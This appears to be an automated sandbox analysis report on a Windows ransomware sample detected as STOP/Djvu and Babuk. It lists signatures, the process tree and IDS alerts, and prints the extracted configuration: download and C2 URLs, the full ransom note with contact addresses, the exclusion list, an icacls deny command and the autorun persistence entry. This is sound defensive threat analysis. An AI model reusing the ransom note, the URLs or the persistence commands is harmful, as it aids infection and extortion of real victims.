Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
tsnsd8pOvn.exe

Overview

General Information

Sample name:tsnsd8pOvn.exe
renamed because original name is a hash value
Original sample name:04e42207db45792cae0f6d3fd83f0680N.exe
Analysis ID:1499386
MD5:04e42207db45792cae0f6d3fd83f0680
SHA1:cb17f3a1bb57541204afd27313b390e5ead5096c
SHA256:b377b7b8211e454117ba3d6cd6bb1ac84c0105c8647187cb5cf19ad50c9d26b9
Tags:exe
Infos:

Detection

Babuk, Djvu
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Found ransom note / readme
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Babuk Ransomware
Yara detected Djvu Ransomware
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Infects executable files (exe, dll, sys, html)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Writes a notice file (html or txt) to demand a ransom
Writes many files with high entropy
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • tsnsd8pOvn.exe (PID: 5000 cmdline: "C:\Users\user\Desktop\tsnsd8pOvn.exe" MD5: 04E42207DB45792CAE0F6D3FD83F0680)
    • tsnsd8pOvn.exe (PID: 972 cmdline: "C:\Users\user\Desktop\tsnsd8pOvn.exe" MD5: 04E42207DB45792CAE0F6D3FD83F0680)
      • icacls.exe (PID: 1524 cmdline: icacls "C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258" /deny *S-1-1-0:(OI)(CI)(DE,DC) MD5: 2E49585E4E08565F52090B144062F97E)
      • tsnsd8pOvn.exe (PID: 6628 cmdline: "C:\Users\user\Desktop\tsnsd8pOvn.exe" --Admin IsNotAutoStart IsNotTask MD5: 04E42207DB45792CAE0F6D3FD83F0680)
        • tsnsd8pOvn.exe (PID: 416 cmdline: "C:\Users\user\Desktop\tsnsd8pOvn.exe" --Admin IsNotAutoStart IsNotTask MD5: 04E42207DB45792CAE0F6D3FD83F0680)
  • tsnsd8pOvn.exe (PID: 3180 cmdline: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe --Task MD5: 04E42207DB45792CAE0F6D3FD83F0680)
    • tsnsd8pOvn.exe (PID: 6408 cmdline: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe --Task MD5: 04E42207DB45792CAE0F6D3FD83F0680)
  • tsnsd8pOvn.exe (PID: 1208 cmdline: "C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe" --AutoStart MD5: 04E42207DB45792CAE0F6D3FD83F0680)
    • tsnsd8pOvn.exe (PID: 6292 cmdline: "C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe" --AutoStart MD5: 04E42207DB45792CAE0F6D3FD83F0680)
  • tsnsd8pOvn.exe (PID: 6956 cmdline: "C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe" --AutoStart MD5: 04E42207DB45792CAE0F6D3FD83F0680)
    • tsnsd8pOvn.exe (PID: 1492 cmdline: "C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe" --AutoStart MD5: 04E42207DB45792CAE0F6D3FD83F0680)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
BabukBabuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and a 32bit old PE executable were observed over time. as well It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.babuk
NameDescriptionAttributionBlogpost URLsLink
STOP, DjvuSTOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stop
{"Download URLs": ["http://asvb.top/files/penelop/updatewin1.exe", "http://asvb.top/files/penelop/updatewin2.exe", "http://asvb.top/files/penelop/updatewin.exe", "http://asvb.top/files/penelop/3.exe", "http://asvb.top/files/penelop/4.exe", "http://asvb.top/files/penelop/5.exe"], "C2 url": "http://asvb.top/nddddhsspen6/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-TVrnNufMGq\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpteam@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@airmail.cc\r\n\r\nYour personal ID:\r\n0296Sirj", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAmCjH4IH1RSzyZ4fA+Ywb\\\\njsJ0u\\/T6brAr00FwAQRglbWZDleNtXyI6mWiM5FdbU6PIoKv8KraOo004ZnKrheO\\\\nu1SIGq24NbUUFqsy+alkWsiO3g8lz4UmT2UKIZH9bk5JnaUCC2yd3ZANlfRCSr2q\\\\ncCLOUZL2JoJx\\/jgYFUm4p93A4CwU2yyfF3FmTkMurpyXKKDj71lpE3ZeHNvOUjuW\\\\n0PJUAAq\\/oHPB3WCywglI6YypFJ5I7fJda8q6\\/vQV\\/ddtdT5HQHcyhm9gNnen62HF\\\\ns650mkgzLjWSeb0AffgK8p9iDhcyF+xK0HMuV4tv5vDBj1wZ887dfeBLwuGrGsGi\\\\nSwIDAQAB\\\\n-----END PUBLIC KEY-----"}
SourceRuleDescriptionAuthorStrings
00000008.00000002.3368713688.00000000006D7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
    0000000A.00000002.2339633794.0000000002147000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000005.00000002.2213957997.0000000002164000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000006.00000002.2240762289.0000000002088000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000000.00000002.2147222942.0000000002178000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    Click to see the 48 entries
    SourceRuleDescriptionAuthorStrings
    10.2.tsnsd8pOvn.exe.22515a0.1.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
      10.2.tsnsd8pOvn.exe.22515a0.1.unpackWindows_Ransomware_Stop_1e8d48ffunknownunknown
      • 0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
      • 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
      10.2.tsnsd8pOvn.exe.22515a0.1.unpackMALWARE_Win_STOPDetects STOP ransomwareditekSHen
      • 0xfd288:$x1: C:\SystemID\PersonalID.txt
      • 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC)
      • 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\
      • 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\
      • 0xfd6ec:$s1: " --AutoStart
      • 0xfd700:$s1: " --AutoStart
      • 0x101348:$s2: --ForNetRes
      • 0x101310:$s3: --Admin
      • 0x101790:$s4: %username%
      • 0x1018b4:$s5: ?pid=
      • 0x1018c0:$s6: &first=true
      • 0x1018d8:$s6: &first=false
      • 0xfd7f4:$s7: delself.bat
      • 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
      • 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
      • 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
      2.2.tsnsd8pOvn.exe.400000.0.raw.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
        2.2.tsnsd8pOvn.exe.400000.0.raw.unpackWindows_Ransomware_Stop_1e8d48ffunknownunknown
        • 0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
        • 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
        Click to see the 55 entries

        System Summary

        barindex
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe" --AutoStart, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\tsnsd8pOvn.exe, ProcessId: 972, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper
        Timestamp:2024-08-26T23:32:41.298785+0200
        SID:2803274
        Severity:2
        Source Port:52648
        Destination Port:80
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-08-26T23:32:41.298785+0200
        SID:2018581
        Severity:1
        Source Port:52648
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-26T23:32:41.298785+0200
        SID:2020826
        Severity:1
        Source Port:52648
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-26T23:32:41.298785+0200
        SID:2036333
        Severity:1
        Source Port:52648
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-26T23:32:03.640222+0200
        SID:2803274
        Severity:2
        Source Port:52640
        Destination Port:80
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-08-26T23:31:17.409857+0200
        SID:2803274
        Severity:2
        Source Port:49716
        Destination Port:443
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-08-26T23:32:58.064861+0200
        SID:2803274
        Severity:2
        Source Port:52651
        Destination Port:80
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-08-26T23:32:58.064861+0200
        SID:2833438
        Severity:1
        Source Port:52651
        Destination Port:80
        Protocol:TCP
        Classtype:Malware Command and Control Activity Detected
        Timestamp:2024-08-26T23:31:15.144397+0200
        SID:2803274
        Severity:2
        Source Port:49712
        Destination Port:443
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-08-26T23:32:56.445703+0200
        SID:2803274
        Severity:2
        Source Port:52650
        Destination Port:80
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-08-26T23:32:56.445703+0200
        SID:2036334
        Severity:1
        Source Port:52650
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-26T23:31:37.065347+0200
        SID:2803274
        Severity:2
        Source Port:49714
        Destination Port:80
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-08-26T23:33:02.658754+0200
        SID:2803274
        Severity:2
        Source Port:52652
        Destination Port:80
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-08-26T23:33:02.658754+0200
        SID:2018581
        Severity:1
        Source Port:52652
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-26T23:33:02.658754+0200
        SID:2020826
        Severity:1
        Source Port:52652
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-26T23:33:02.658754+0200
        SID:2036333
        Severity:1
        Source Port:52652
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-26T23:31:38.858740+0200
        SID:2803274
        Severity:2
        Source Port:49717
        Destination Port:80
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-08-26T23:31:38.858740+0200
        SID:2833438
        Severity:1
        Source Port:49717
        Destination Port:80
        Protocol:TCP
        Classtype:Malware Command and Control Activity Detected
        Timestamp:2024-08-26T23:31:34.643947+0200
        SID:2803274
        Severity:2
        Source Port:52638
        Destination Port:443
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-08-26T23:32:30.047078+0200
        SID:2803274
        Severity:2
        Source Port:52645
        Destination Port:80
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-08-26T23:31:58.536295+0200
        SID:2803274
        Severity:2
        Source Port:52639
        Destination Port:80
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-08-26T23:31:58.536295+0200
        SID:2020826
        Severity:1
        Source Port:52639
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-26T23:31:58.536295+0200
        SID:2036333
        Severity:1
        Source Port:52639
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-26T23:32:05.302518+0200
        SID:2803274
        Severity:2
        Source Port:52641
        Destination Port:80
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-08-26T23:32:05.302518+0200
        SID:2833438
        Severity:1
        Source Port:52641
        Destination Port:80
        Protocol:TCP
        Classtype:Malware Command and Control Activity Detected
        Timestamp:2024-08-26T23:30:59.584547+0200
        SID:2803274
        Severity:2
        Source Port:52654
        Destination Port:80
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-08-26T23:30:59.584547+0200
        SID:2018581
        Severity:1
        Source Port:52654
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-26T23:30:59.584547+0200
        SID:2020826
        Severity:1
        Source Port:52654
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-26T23:30:59.584547+0200
        SID:2036333
        Severity:1
        Source Port:52654
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-26T23:31:27.641342+0200
        SID:2803274
        Severity:2
        Source Port:52636
        Destination Port:443
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-08-26T23:32:31.658617+0200
        SID:2803274
        Severity:2
        Source Port:52646
        Destination Port:80
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-08-26T23:32:31.658617+0200
        SID:2833438
        Severity:1
        Source Port:52646
        Destination Port:80
        Protocol:TCP
        Classtype:Malware Command and Control Activity Detected
        Timestamp:2024-08-26T23:32:19.926942+0200
        SID:2803274
        Severity:2
        Source Port:52643
        Destination Port:80
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-08-26T23:32:19.926942+0200
        SID:2020826
        Severity:1
        Source Port:52643
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-26T23:32:19.926942+0200
        SID:2036333
        Severity:1
        Source Port:52643
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-26T23:31:09.086681+0200
        SID:2803274
        Severity:2
        Source Port:49711
        Destination Port:443
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-08-26T23:31:37.061694+0200
        SID:2803274
        Severity:2
        Source Port:49713
        Destination Port:80
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-08-26T23:31:37.061694+0200
        SID:2020826
        Severity:1
        Source Port:49713
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-26T23:31:37.061694+0200
        SID:2036333
        Severity:1
        Source Port:49713
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: tsnsd8pOvn.exeAvira: detected
        Source: https://autodiscover.uk/Autodiscover/Autodiscover.xmlAvira URL Cloud: Label: malware
        Source: https://autodiscover.in/Autodiscover/Autodiscover.xmlAvira URL Cloud: Label: malware
        Source: https://autodiscover.it/Autodiscover/Autodiscover.xmlAvira URL Cloud: Label: malware
        Source: https://autodiscover.fr/Autodiscover/Autodiscover.xmlAvira URL Cloud: Label: malware
        Source: https://autodiscover.xyz/Autodiscover/Autodiscover.xmlAvira URL Cloud: Label: malware
        Source: https://autodiscover.com.br/autodiscover/autodiscover.xmlAvira URL Cloud: Label: malware
        Source: https://autodiscover.sg/Autodiscover/Autodiscover.xmlAvira URL Cloud: Label: malware
        Source: https://autodiscover.es/Autodiscover/Autodiscover.xmlAvira URL Cloud: Label: malware
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeAvira: detection malicious, Label: HEUR/AGEN.1316832
        Source: 0000000C.00000002.2413430866.00000000021C0000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Djvu {"Download URLs": ["http://asvb.top/files/penelop/updatewin1.exe", "http://asvb.top/files/penelop/updatewin2.exe", "http://asvb.top/files/penelop/updatewin.exe", "http://asvb.top/files/penelop/3.exe", "http://asvb.top/files/penelop/4.exe", "http://asvb.top/files/penelop/5.exe"], "C2 url": "http://asvb.top/nddddhsspen6/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-TVrnNufMGq\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpteam@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@airmail.cc\r\n\r\nYour personal ID:\r\n0296Sirj", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeReversingLabs: Detection: 86%
        Source: tsnsd8pOvn.exeReversingLabs: Detection: 86%
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeJoe Sandbox ML: detected
        Source: tsnsd8pOvn.exeJoe Sandbox ML: detected
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,2_2_0040E870
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_0040EA51 CryptDestroyHash,CryptReleaseContext,2_2_0040EA51
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,2_2_0040EAA0
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_0040EC68 CryptDestroyHash,CryptReleaseContext,2_2_0040EC68
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,2_2_00410FC0
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_00411178 CryptDestroyHash,CryptReleaseContext,2_2_00411178
        Source: tsnsd8pOvn.exe, 00000007.00000003.3347231152.0000000003120000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_54fcdbf9-4

        Compliance

        barindex
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeUnpacked PE file: 2.2.tsnsd8pOvn.exe.400000.0.unpack
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeUnpacked PE file: 7.2.tsnsd8pOvn.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeUnpacked PE file: 8.2.tsnsd8pOvn.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeUnpacked PE file: 11.2.tsnsd8pOvn.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeUnpacked PE file: 13.2.tsnsd8pOvn.exe.400000.0.unpack
        Source: tsnsd8pOvn.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\_readme.txtJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\$WinREAgent\_readme.txtJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\$WinREAgent\Scratch\_readme.txtJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\_readme.txtJump to behavior
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49711 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49712 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49716 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:52636 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:52638 version: TLS 1.2
